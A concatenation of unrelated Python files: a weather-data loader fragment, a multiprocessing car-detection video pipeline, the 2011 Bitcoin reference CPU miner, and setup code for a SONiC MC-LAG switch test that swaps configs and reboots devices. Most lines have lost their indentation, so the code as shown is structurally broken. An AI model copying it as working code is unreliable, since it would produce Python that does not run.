except:
pass
buffer_obj = buffer(constants.db_name_week_mean)
data = parse_grb_files.parse_files_by_week(file_path_dict, iso_year=iso_year, iso_week=iso_week)
buffer_obj.insert_to_db(data, label=constants.year_week_label)
buffer_obj.flush()
return;
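# Hedged driver sketch for load_by_week_mean(): it expects the Monday of an ISO week
# as a 'yyyy-mm-dd' string plus the ISO (year, week) pair. A helper like the one below
# (not part of the original module) could derive those arguments from a date object.
def _week_args_for(day):
    iso_year, iso_week, _ = day.isocalendar()
    monday = day - timedelta(days=day.weekday())
    return monday.strftime('%Y-%m-%d'), iso_year, iso_week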
# ---------------------------------------------------------------#
#
# Load complete data for each date into db
#
def load_by_date_complete( ):
cur_year = utils.get_current_year()
os.chdir(constants.data_dir)
os.chdir(constants.gdas_data_dir)
years = range(constants.gdas_start_year, cur_year + 1)
process_pool = []
for year in years:
p = Process(target=process_year_by_date_complete, args=(year,))
process_pool.append(p)
for p in process_pool:
p.start()
for p in process_pool:
p.join()
return;
|
VideoQueryProcessor.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 14 16:45:29 2020
@author: ajink / manivs
"""
import cv2
import csv
import argparse
from DetectColour import DetectColour
from DetectCar import DetectCar
# Begin Mani
from datetime import datetime
import time
from DetectCartype import DetectCartype
from multiprocessing import Process, Queue
# End
#Begin Mani
video = "./video.mp4"
#End
#Create an object of detect car class
detect_car = DetectCar()
#Create an object of detect colour class
detect_colour =DetectColour()
#Start Mani
detect_cartype = DetectCartype()
def wirteData(csv_file,csv_columns,dict_data):
#csv writer logic
try:
print("Writing Data")
        with open(csv_file, 'w', newline='') as csvfile:  # open the CSV file
            writer = csv.DictWriter(csvfile, fieldnames=csv_columns)  # create a CSV writer object
            writer.writeheader()  # write the column header
            for data in dict_data:  # loop through the list of dictionaries
                writer.writerow(data)  # write each dict as a row
except IOError:
print("I/O error")
#-------------------------------------
#Video to frame converter
#-------------------------------------
def videoFrame(frame_queue):
frame_no = 1
video_capture = cv2.VideoCapture(video)#Open Video
    while video_capture.isOpened():  # read while the video is open
        ret, frame = video_capture.read()  # read each frame
        if ret == True:
            # Write images to the output location if needed
            #cv2.imwrite('C:\\Users\\ajink\\RTAIAssignment2\\car_detection_in_video-master\\out\\'+str(frame_no)+'.jpg',frame)
            frame_queue.put(frame)  # pass the frame to the frame queue
            print(frame_no)  # print frame no
            frame_no += 1  # increase the frame count
if cv2.waitKey(25) & 0xFF == ord('q'):
break
else:
break
#Once the video is over release video capture
video_capture.release()
# Closes all the windows
cv2.destroyAllWindows()
#-------------------------------------
#Target function for Q1
#-------------------------------------
def videoProcessorQ1(frame_queue1,frame_queue_1,frame_queue_2,r1):
frame_no = 1
result=[]
while True:
        objectCount = {}  # define the result dictionary for this frame
        if (frame_queue1.empty() == False):  # process while the queue is not empty
            frame1 = frame_queue1.get()  # get an item (frame) from the queue
            seconds = datetime.now()  # start time
            frame_details = detect_car.detect_Car(frame_no, frame1)  # get details of the frame using the DetectCar class
            frame_queue_1.put(frame_details)  # put details in the colour detection queue
            frame_queue_2.put(frame_details)  # put details in the type detection queue
            car_count = len(frame_details.getObjects())  # count the cars in the frame
            objectCount["FNo"] = frame_no  # add the frame no to the result dictionary
            frame_no += 1  # increase the frame number count
            objectCount["ObjectCount"] = car_count  # add the object count to the result dictionary
            seconds1 = datetime.now()  # end time
            t = seconds1 - seconds  # time difference
            objectCount["Time"] = t.total_seconds() * 1000  # store the elapsed time in milliseconds
            result.append(objectCount)  # append each frame result to the final result list
            r1.put(objectCount)  # put the frame result in the result1 queue
else:
if frame_no >=1495:#If frame count is more than 1495 write results on file and break
wirteData("Q1.csv",['FNo', 'ObjectCount', 'Time'],result)
break
else:
pass
#-------------------------------------
#Target function for Q3 (colour detection)
#-------------------------------------
def videoProcessorQ3(frame_queue1,r2):
frame_no=1
result=[]
while True:
objectCount={}
colour_list=[]
        if (frame_queue1.empty() == False):  # process while the queue is not empty
            seconds = datetime.now()  # start time
            frame_details = frame_queue1.get()  # get frame details from the queue
            car_count = len(frame_details.getObjects())  # count the cars in the frame
            objectCount["FNo"] = frame_no  # add the frame no to the result dictionary
            frame_no += 1  # increase the frame number count
            objectCount["ObjectCount"] = car_count  # add the object count to the result dictionary
            if car_count < 1:  # if there are no cars in the frame
                seconds1 = datetime.now()  # end time
                t = seconds1 - seconds  # time difference
                objectCount["Time"] = t.total_seconds() * 1000  # store the elapsed time in milliseconds
                objectCount["ObjectColour"] = "NA"  # set the colour to NA
else:
for bounding_box in frame_details.getObjects():#For each object in given frame
#Get the hsv value of given image
hsv=detect_colour.get_hsv(bounding_box)
#Get the colour of object(Car) from image
colour=detect_colour.get_colour(hsv)
colour_list.append(colour)#Append the colour to list
seconds1 = datetime.now()
objectCount["ObjectColour"]=colour_list
t=seconds1-seconds#time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
result.append(objectCount)#Append each frame result to fial result list
r2.put(objectCount)#Put frame result in result2 queue
else:
if frame_no >=1495:#If frame count is more than 1495 write results on file and break
wirteData("Q3.csv",['FNo', 'ObjectCount', 'Time',"ObjectColour"],result)
break
else:
pass
#-------------------------------------
#Target function for Q2 (car type detection)
#-------------------------------------
def videoProcessorQ2(frame_queue1,r3):
frame_no=1
result=[]
while True:
objectCount={}
car_list=[]
        if (frame_queue1.empty() == False):  # process while the queue is not empty
            seconds = datetime.now()  # start time
            frame_details = frame_queue1.get()  # get frame details from the queue
            car_count = len(frame_details.getObjects())  # count the cars in the frame
            objectCount["FNo"] = frame_no  # add the frame no to the result dictionary
            objectCount["ObjectCount"] = car_count  # add the object count to the result dictionary
            frame_no += 1  # increase the frame number count
            if car_count < 1:  # if there are no cars in the frame
                seconds1 = datetime.now()  # end time
                t = seconds1 - seconds  # time difference
                objectCount["Time"] = t.total_seconds() * 1000  # store the elapsed time in milliseconds
                objectCount["Type"] = "NA"  # set the type to NA
                objectCount["Boxes"] = "NA"  # set the bounding boxes to NA
else:
for bounding_box in frame_details.getObjects():#For each object in given frame
car_type = detect_cartype.predict_cartype(bounding_box)#Predict car type
if car_type == "Hatchback":
objectCount["Type"]=car_list#Set type
car_list.append(car_type)#append result to list
else:
objectCount["Type"]=car_list#Set type
car_list.append(car_type)#append result to list
seconds1 = datetime.now()#Find time now
objectCount["Boxes"]=frame_details.getRect()#set boxes
t=seconds1-seconds#get time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
result.append(objectCount)
r3.put(objectCount)
else:
if frame_no >=1495:#If frame count is more than 1495 write results on file and break
wirteData("Q2.csv",['FNo', 'ObjectCount', 'Time',"Type","Boxes"],result)
break
else:
pass
#print("\nWaiting for item in Q3 queue\n")
#-------------------------------------
#Target function for Printing data
#-------------------------------------
def printData(Query,r1,r2,r3):
frame_no=1
results=[]
resultsT=[]
while True:
        times = {}  # per-frame timings dictionary
colour_types = { 'Black':0,
'Silver':0,
'Red':0,
'White':0,
'Blue':0
}
#initialize result row
result_row = { "FrameNo":frame_no,
"Sedan": colour_types.copy(),
"Hatchback": colour_types.copy(),
"Total":0
}
if(r1.empty()==False):#check if queue is empty
r1_obj=r1.get()#get item from result1 queue
            r2_obj = r2.get()  # get an item from the result2 queue
            r3_obj = r3.get()  # get an item from the result3 queue
if Query==3:#Check query option
print("\n--------------")
print("Query fired:",Query)
print("--------------")
print("Frame No: "+str(r1_obj["FNo"])+"\nCar Count: "+str(r1_obj["ObjectCount"])+"\nCar Clolour: "+str(r2_obj["ObjectColour"])+"\nCar Type: "+str(r3_obj["Type"])+"\nQ3 Time: "+str(r1_obj["Time"]+r2_obj["Time"]+r2_obj["Time"]))
time.sleep(0.5)
elif Query==2:
print("\n--------------")
print("Query fired:",Query)
print("--------------")
print("Frame No: "+str(r1_obj["FNo"])+"\nCar Count: "+str(r1_obj["ObjectCount"])+"\nCar Type: "+str(r3_obj["Type"])+"\nQ2 Time: "+str(r1_obj["Time"]+r2_obj["Time"]))
time.sleep(0.5)
elif Query==1:
print("\n--------------")
print("Query fired:",Query)
print("--------------")
print("Frame No: "+str(r1_obj["FNo"])+"\nCar Count: "+str(r1_obj["ObjectCount"])+"\nQ1 Time: "+str(r1_obj["Time"]))
time.sleep(0.5)
times["Frame No"]=str(r1_obj["FNo"])#set frame no for times dict
times["Q1"]=int(r1_obj["Time"])#set Q1 time for times dict
times["Q2"]=int(r1_obj["Time"]+r3_obj["Time"])#set Q1+Q2 time for times dict
times["Q3"]=int(r1_obj["Time"]+r2_obj["Time"]+r3_obj["Time"])#set Q1+Q2+Q3 time for times dict
if r1_obj["ObjectCount"]<1:#If object count less than one
result_row["FrameNo"]=r1_obj["FNo"]
result_row["Total"]=r1_obj["ObjectCount"]
else:
for colour,ctype in zip(r2_obj["ObjectColour"],r3_obj["Type"]):
colour_types[colour]+=1
result_row[ctype]=colour_types.copy()
result_row["FrameNo"]=r1_obj["FNo"]
result_row["Total"]=r1_obj["ObjectCount"]
results.append(result_row)#append results
resultsT.append(times)#append time results
frame_no+=1#increase frame count
else:#If frame count is more than 1495 write results on file and break
if frame_no >=1494:
with open('predictions.csv', 'w', newline='') as f:
writer = csv.writer(f)
for result_row in results:
csv_row = []
csv_row.append(result_row["FrameNo"])
for colour_count in result_row["Sedan"].values():
csv_row.append(colour_count)
for colour_count in result_row["Hatchback"].values():
csv_row.append(colour_count)
csv_row.append(result_row["Total"])
writer.writerow(csv_row)
wirteData("Times.csv",['Frame No', 'Q1', 'Q2',"Q3"],resultsT)
break
else:
print("\nWaiting for items\n")
def main():
# Get arguments from command line ...
parser = argparse.ArgumentParser()
parser.add_argument("-q", "--query",
help="query")
args = parser.parse_args()
Query=int(args.query)#Convert command line arg to int
print(type(Query))
frame_queue = Queue()#Create Frame queue
    frame_queue_1 = Queue()  # create the queue feeding the colour detection worker
    frame_queue_2 = Queue()  # create the queue feeding the type detection worker
r1 = Queue()#Queue for result of Q1
r2 = Queue()#Queue for result of Q2
r3 = Queue()#Queue for result of Q3
p1=Process(target=videoFrame, args=(frame_queue,))#Create process for video to frame conversion
#Create process for Q1
p2=Process(target=videoProcessorQ1, args=(frame_queue,frame_queue_1,frame_queue_2,r1))
#Create process for Q2
p3=Process(target=videoProcessorQ3, args=(frame_queue_1,r2))
#Create process for Q3
p4=Process(target=videoProcessorQ2, args=(frame_queue_2,r3))
#Create process for printing results
p5=Process(target=printData, args=(Query,r1,r2,r3))
#Start process P1
p1.start()
#Sleep for 2 sec
time.sleep(2)
#Start process P2
p2.start()
print("Q1 Start")
#Start process P3
p3.start()
print("Q2 Start")
#Start process P4
p4.start()
print("Q3 Start")
time.sleep(4)
#Join all processes
p5.start()
p1.join()
p2.join()
p3.join()
p4.join()
if __name__ == "__main__":
print("Start")
#Get initial time
seconds = time.time()
#Call main
main()
#get end time of execution
seconds1 = time.time()
print("-->Total time taken:",seconds1-seconds)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
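# Hedged worked examples for the helpers above (values chosen for illustration,
# nothing in the script asserts them):
#   bytereverse(0x12345678) == 0x78563412    # byte-swap a single 32-bit word
#   bufreverse('abcdwxyz')  == 'dcbazyxw'    # reverse the bytes inside each 4-byte word
#   wordreverse('abcdwxyz') == 'wxyzabcd'    # reverse the order of the 4-byte words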
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 42000
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_mclag.py
|
import csv
import json
import logging
import re
import random
import sys
import time
import threading
import Queue
import ipaddr as ipaddress
import pytest
from ansible_host import AnsibleHost
from common.devices import SonicHost
from common.utilities import wait_until
from natsort import natsorted
from ptf_runner import ptf_runner
sys.path.append("../ansible/library")
import topo_facts
# global vars
g_vars = {}
test_scenario = "l2"
testbed_mtu = 8100 # set the MC-LAG keepalive interface MTU; it should be smaller than the MTU of your testbed's trunk port (which connects to the root fanout switch).
mclag_local_ip = ipaddress.IPNetwork("10.100.0.1/30")
mclag_peer_ip = ipaddress.IPNetwork("{}/{}".format(mclag_local_ip.ip+1, mclag_local_ip.prefixlen))
# SSH defines
SONIC_SSH_PORT = 22
SONIC_SSH_REGEX = 'OpenSSH_[\\w\\.]+ Debian'
class TBInfo(object):
"""
    Parse the CSV file that describes the whole testbed.
    Please refer to the example CSV file for the expected format.
    The first line of the CSV file is the title row; the topology name
    column is either 'uniq-name' or 'conf-name'.
"""
def __init__(self, testbed_file):
self.testbed_filename = testbed_file
self.testbed_topo = {}
with open(self.testbed_filename) as f:
topo = csv.DictReader(f)
for line in topo:
tb_prop = {}
name = ''
for key in line:
if ('uniq-name' in key or 'conf-name' in key) and '#' in line[key]:
### skip comment line
continue
elif 'uniq-name' in key or 'conf-name' in key:
name = line[key]
elif 'ptf_ip' in key and line[key]:
ptfaddress = ipaddress.IPNetwork(line[key])
tb_prop['ptf_ip'] = str(ptfaddress.ip)
tb_prop['ptf_netmask'] = str(ptfaddress.netmask)
else:
tb_prop[key] = line[key]
if name:
self.testbed_topo[name] = tb_prop
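# Hedged example of the testbed CSV this class consumes (column names taken from the
# parsing code above plus the 'dut' key used later in duthost2; values are illustrative):
#   conf-name,ptf_ip,dut
#   mclag-l2-01,10.250.0.100/24,dut1-hostname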
# functions
def continuous_traffic_check(casename, event, ptf_runner, exc_queue, **kwargs):
'''
    With this simple wrapper function we can use a Queue to store exception
    info and check it later in the main thread.
Example:
refer to test warm_reboot
'''
while True:
try:
log_file = "/tmp/mclag/log/mclag_{}_[{}]_[{}]_{}.log".format(test_scenario, casename, sys._getframe().f_code.co_name, time.strftime("%H%M%S"))
ptf_runner(log_file=log_file, **kwargs)
except Exception:
exc_queue.put(sys.exc_info())
if not event.is_set():
break
def check_teamd_status(host, addr=None, status='up', ptf=False, base=0, select=True):
if ptf:
for lag in g_vars['mclag_interfaces']:
lag_id = int(lag.strip("PortChannel"))
state = host.shell("teamdctl PortChannel{} state dump".format(lag_id))['stdout']
port = base + (lag_id - 1)
server_port_status = json.loads(state)['ports']['eth{}'.format(port)]['runner']['selected']
logging.info("Device: {}, status: {}, expect: {}".format(lag, server_port_status, select))
if server_port_status == select:
continue
else:
return False
else:
for lag in g_vars['mclag_interfaces']:
sys_id = host.shell("teamdctl {} state item get team_device.ifinfo.dev_addr".format(lag))['stdout']
logging.info("Device: {}, dev_addr: {}".format(lag, sys_id))
if sys_id != addr:
return False
else:
continue
time.sleep(30)
for lag in g_vars['mclag_interfaces']:
lag_status = host.shell("redis-cli -n 0 hget LAG_TABLE:{} oper_status".format(lag))['stdout']
logging.info("Device: {}, oper_status: {}".format(lag, lag_status))
if lag_status != status:
return False
else:
continue
return True
def check_warm_status(host):
finalizer_state = host.shell("systemctl is-active warmboot-finalizer.service", module_ignore_errors=True)['stdout']
if finalizer_state == 'inactive':
return True
else:
return False
# FIXME later may move to "common.reboot"
#
# The reason to introduce a new 'reboot' here is due to
# the difference of fixture 'localhost' between the two 'reboot' functions.
#
# 'common.reboot' request *ansible_fixtures.localhost*,
# but here it request *common.devices.Localhost*.
def reboot(duthost, localhost, delay=10, timeout=180, wait=120, basic_check=True):
"""
cold reboots DUT
:param duthost: DUT host object
:param localhost: local host object
:param delay: delay between ssh availability checks
:param timeout: timeout for waiting ssh port state change
:param wait: time to wait for DUT to initialize
:param basic_check: check duthost.critical_services_fully_started after DUT initialize
:return:
"""
dut_ip = duthost.host.options['inventory_manager'].get_host(duthost.hostname).address
duthost.shell("nohup reboot &")
logging.info('waiting for ssh to drop')
res = localhost.wait_for(host=dut_ip,
port=SONIC_SSH_PORT,
state='absent',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
if res.is_failed:
raise Exception('DUT did not shutdown')
# TODO: add serial output during reboot for better debuggability
# This feature requires serial information to be present in
# testbed information
logging.info('waiting for ssh to startup')
res = localhost.wait_for(host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
if res.is_failed:
raise Exception('DUT did not startup')
logging.info('ssh has started up')
logging.info('waiting for switch to initialize')
time.sleep(wait)
if basic_check:
assert wait_until(timeout, 10, duthost.critical_services_fully_started), \
"All critical services should fully started!{}".format(duthost.CRITICAL_SERVICES)
# fixtures
@pytest.fixture(scope="module")
def localhost(testbed_devices):
return testbed_devices['localhost']
@pytest.fixture(scope="module")
def duthost2(ansible_adhoc, request):
"""
Shortcut fixture for getting DUT2 host
"""
tbname = request.config.getoption("--testbed")
tbfile = request.config.getoption("--testbed_file")
tbinfo = TBInfo(tbfile)
hostname2 = tbinfo.testbed_topo[tbname+'-dut2']['dut']
return SonicHost(ansible_adhoc, hostname2, gather_facts=True)
@pytest.fixture(scope="module", autouse=True)
def setup_init(testbed, duthost, duthost2, ptfhost, localhost):
global g_vars
# get dut origin router-mac
g_vars.update({'dut1_router_mac': duthost.shell("redis-cli -n 4 hget 'DEVICE_METADATA|localhost' mac")['stdout']})
g_vars.update({'dut2_router_mac': duthost2.shell("redis-cli -n 4 hget 'DEVICE_METADATA|localhost' mac")['stdout']})
tp_facts = topo_facts.ParseTestbedTopoinfo().get_topo_config(testbed['topo'])
tp_facts_dut1 = topo_facts.ParseTestbedTopoinfo().get_topo_config(testbed['topo'] + "_dut1")
tp_facts_dut2 = topo_facts.ParseTestbedTopoinfo().get_topo_config(testbed['topo'] + "_dut2")
# get mclag topo info
g_vars.update({'mclag_interconnection_interfaces': tp_facts['devices_interconnect_interfaces'].values()})
g_vars.update({'mclag_link_server_interfaces': tp_facts['host_interfaces']})
g_vars.update({'mclag_link_vm_interfaces': tp_facts['link_vm_interfaces']})
# get dut topo info
g_vars.update({'dut1_interconnection_interfaces': [p for port in tp_facts_dut1['devices_interconnect_interfaces'].values() for p in port]})
g_vars.update({'dut1_link_server_interfaces': tp_facts_dut1['host_interfaces']})
g_vars.update({'dut1_link_vm_interfaces': tp_facts_dut1['link_vm_interfaces']})
g_vars.update({'dut1_all_interfaces': g_vars['dut1_link_server_interfaces'] + g_vars['dut1_interconnection_interfaces'] + g_vars['dut1_link_vm_interfaces']})
g_vars.update({'dut2_interconnection_interfaces': [p for port in tp_facts_dut2['devices_interconnect_interfaces'].values() for p in port]})
g_vars.update({'dut2_link_server_interfaces': [p for p in g_vars['mclag_link_server_interfaces'] if p not in g_vars['dut1_link_server_interfaces']]})
g_vars.update({'dut2_link_vm_interfaces': [p for p in g_vars['mclag_link_vm_interfaces'] if p not in g_vars['dut1_link_vm_interfaces']]})
g_vars.update({'dut2_all_interfaces': g_vars['dut2_link_server_interfaces'] + g_vars['dut2_interconnection_interfaces'] + g_vars['dut2_link_vm_interfaces']})
# get dut1/dut2 port_alias
dut1_hwsku = duthost.shell("show platform summary |grep HwSKU|awk '{print $2}'")['stdout']
dut2_hwsku = duthost2.shell("show platform summary |grep HwSKU|awk '{print $2}'")['stdout']
g_vars.update({'dut1_port_alias': duthost.port_alias(hwsku=dut1_hwsku)['ansible_facts']})
g_vars.update({'dut2_port_alias': duthost2.port_alias(hwsku=dut2_hwsku)['ansible_facts']})
# get dut1/dut2 orphan ports (as PTF port indices)
g_vars.update({'dut1_orphan_ports': g_vars['dut1_link_server_interfaces'][len(g_vars['dut1_link_server_interfaces'])/2-2:len(g_vars['dut1_link_server_interfaces'])/2] + \
g_vars['dut1_link_server_interfaces'][-2:]})
g_vars.update({'dut2_orphan_ports': g_vars['dut2_link_server_interfaces'][len(g_vars['dut2_link_server_interfaces'])/2-2:len(g_vars['dut2_link_server_interfaces'])/2] + \
g_vars['dut2_link_server_interfaces'][-2:]})
# init to ptf
ptfhost.shell("mkdir -p /tmp/mclag/log")
ptfhost.copy(src="ptftests", dest="/root")
ptfhost.script("scripts/remove_ip.sh")
ptfhost.script("scripts/change_mac.sh")
g_vars.update({'mclag_port_channel_id_list': range(1, len(g_vars['dut1_link_server_interfaces'])+1)})
ptf_mac_prefix = ptfhost.shell("ip -br link show eth0|awk '{print $3}'")['stdout'][:-2]
g_vars.update({'ptf_mac_prefix': ptf_mac_prefix})
g_vars.update({'dut1_server_mac': [(g_vars['ptf_mac_prefix']+"{:02x}".format(i-1)).upper() for i in g_vars['mclag_port_channel_id_list']]})
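# Servers behind the MCLAG interfaces are reachable from both DUTs through the same PTF
# ports, so dut2 reuses dut1's MACs for them; only the servers on dut2's orphan ports sit
# on PTF ports offset by len(dut1_all_interfaces), which the list below accounts for.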
dut2_server_mac = [(g_vars['ptf_mac_prefix']+"{:02x}".format(i-1)).upper() for i in g_vars['mclag_port_channel_id_list'][:len(g_vars['mclag_port_channel_id_list'])/2-2]] + \
[(g_vars['ptf_mac_prefix']+"{:02x}".format(i+len(g_vars['dut1_all_interfaces'])-1)).upper() for i in g_vars['mclag_port_channel_id_list'][len(g_vars['mclag_port_channel_id_list'])/2-2:len(g_vars['mclag_port_channel_id_list'])/2]] + \
[(g_vars['ptf_mac_prefix']+"{:02x}".format(i-1)).upper() for i in g_vars['mclag_port_channel_id_list'][len(g_vars['mclag_port_channel_id_list'])/2:-2]] + \
[(g_vars['ptf_mac_prefix']+"{:02x}".format(i+len(g_vars['dut1_all_interfaces'])-1)).upper() for i in g_vars['mclag_port_channel_id_list'][-2:]]
g_vars.update({'dut2_server_mac': dut2_server_mac})
for lag_id in g_vars['mclag_port_channel_id_list']:
ptf_extra_vars = {
'test_scenario' : test_scenario,
'item' : lag_id,
'ptf_mac_prefix' : g_vars['ptf_mac_prefix'],
'dut1_all_interfaces' : g_vars['dut1_all_interfaces'],
'dut1_link_server_interfaces': g_vars['dut1_link_server_interfaces'],
'mclag_port_channel_id_list' : g_vars['mclag_port_channel_id_list'],
'mclag_link_vm_interfaces' : g_vars['mclag_link_vm_interfaces']
}
ptfhost.host.options['variable_manager'].extra_vars = ptf_extra_vars
ptfhost.template(src="mclag/mclag_ptf_port_channel_config_files.j2", dest="/tmp/mclag/PortChannel{}.conf".format(lag_id))
ptfhost.template(src="mclag/mclag_ptf_port_channel_startup.j2", dest="/tmp/mclag/mclag_ptf.sh", mode="u+rwx")
ptfhost.template(src="mclag/mclag_switch_info.j2", dest="/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario))
ptfhost.shell("/tmp/mclag/mclag_ptf.sh startup_portchannel_{}".format(test_scenario))
# init to dut
dut1_cfg = json.loads(duthost.shell("sonic-cfggen -d --print-data")['stdout'])
dut2_cfg = json.loads(duthost2.shell("sonic-cfggen -d --print-data")['stdout'])
dut1_extra_vars = {
'test_scenario': test_scenario,
'mtu': testbed_mtu,
'mclag_local_ip': mclag_local_ip.ip,
'mclag_peer_ip': mclag_peer_ip.ip,
'dut_interconnection_interfaces': g_vars['dut1_interconnection_interfaces'],
'port_alias_map': g_vars['dut1_port_alias']['port_alias_map'],
'port_alias': g_vars['dut1_port_alias']['port_alias'],
'port_name_map': g_vars['dut1_port_alias']['port_name_map'],
'mclag_port_channel_id_list': g_vars['mclag_port_channel_id_list'],
'topology': tp_facts_dut1,
'cfg_origin': dut1_cfg
}
duthost.host.options['variable_manager'].extra_vars = dut1_extra_vars
duthost.template(src="mclag/mclag_configuration.j2", dest="/tmp/mclag_{}.json".format(test_scenario))
duthost.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
duthost.shell("cp /tmp/mclag_{}.json /etc/sonic/config_db.json".format(test_scenario))
duthost.shell("systemctl enable iccpd")
reboot(duthost, localhost)
dut2_extra_vars = {
'test_scenario': test_scenario,
'mtu': testbed_mtu,
'mclag_local_ip': mclag_peer_ip.ip,
'mclag_peer_ip': mclag_local_ip.ip,
'dut_interconnection_interfaces': g_vars['dut2_interconnection_interfaces'],
'port_alias_map': g_vars['dut2_port_alias']['port_alias_map'],
'port_alias': g_vars['dut2_port_alias']['port_alias'],
'port_name_map': g_vars['dut2_port_alias']['port_name_map'],
'mclag_port_channel_id_list': g_vars['mclag_port_channel_id_list'],
'topology': tp_facts_dut2,
'cfg_origin': dut2_cfg,
'base': len(g_vars['dut1_all_interfaces'])
}
duthost2.host.options['variable_manager'].extra_vars = dut2_extra_vars
duthost2.template(src="mclag/mclag_configuration.j2", dest="/tmp/mclag_{}.json".format(test_scenario))
duthost2.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
duthost2.shell("cp /tmp/mclag_{}.json /etc/sonic/config_db.json".format(test_scenario))
duthost2.shell("systemctl enable iccpd")
